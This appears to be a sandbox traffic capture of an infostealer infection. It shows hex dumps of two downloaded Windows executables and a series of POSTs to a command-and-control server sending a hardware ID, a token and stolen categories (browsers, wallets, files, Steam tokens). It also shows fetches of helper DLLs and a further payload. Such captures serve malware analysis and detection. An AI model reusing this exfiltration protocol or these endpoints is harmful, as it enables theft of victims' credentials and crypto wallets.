                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 06:26:34 GMTContent-Type: application/octet-streamContent-Length: 1867264Last-Modified: Tue, 02 Jul 2024 05:44:13 GMTConnection: keep-aliveETag: "668393ad-1c7e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 20 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4a 00 00 04 00 00 aa c5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 03 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 03 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 74 78 6f 78 61 6e 7a 00 70 19 00 00 a0 30 00 00 66 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 72 6c 72 63 6e 66 6c 00 10 00 00 00 10 4a 00 00 04 00 00 00 58 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4a 00 00 22 00 00 00 5c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 06:26:45 GMTContent-Type: application/octet-streamContent-Length: 2453504Last-Modified: Tue, 02 Jul 2024 04:03:03 GMTConnection: keep-aliveETag: "66837bf7-257000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 20 16 bd 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 bd 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 20 9c 00 91 0e 00 00 b4 2e 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 78 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 40 21 00 00 f0 9b 00 00 3c 21 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 44 30 46 45 31 37 31 41 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="hwid"8DD0FE171AAC3343412148------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build"jony------CFIEBKEHCAKFCBFIDAAK--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="message"browsers------FHDAFIIDAKJDGDHIDAKJ--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="message"plugins------GDGIJECGDGCBKECAKFBG--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHDHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="message"fplugins------KJDGIJECFIEBFIDHCGHD--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 85.28.47.4Content-Length: 6063Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: 85.28.47.4Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 85.28.47.4Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 2d 2d 0d 0a Data Ascii: ------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file"------CGIJKJJKEBGHJKFIDGCA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="file"------GHJDBAKEHDHDGCAKKJJE--
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 2d 2d 0d 0a Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="message"wallets------GIIJEBAECGCBKECAAAEB--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHCGCGDAAKFIECFHDBHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 2d 2d 0d 0a Data Ascii: ------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="message"files------DBFHCGCGDAAKFIECFHDB--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECAHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file"------EBGIEGCFHCFHIDHIJECA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="message"jbdtaijovg------BAKFCBFHJDHJKECAKEHI--
                        Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
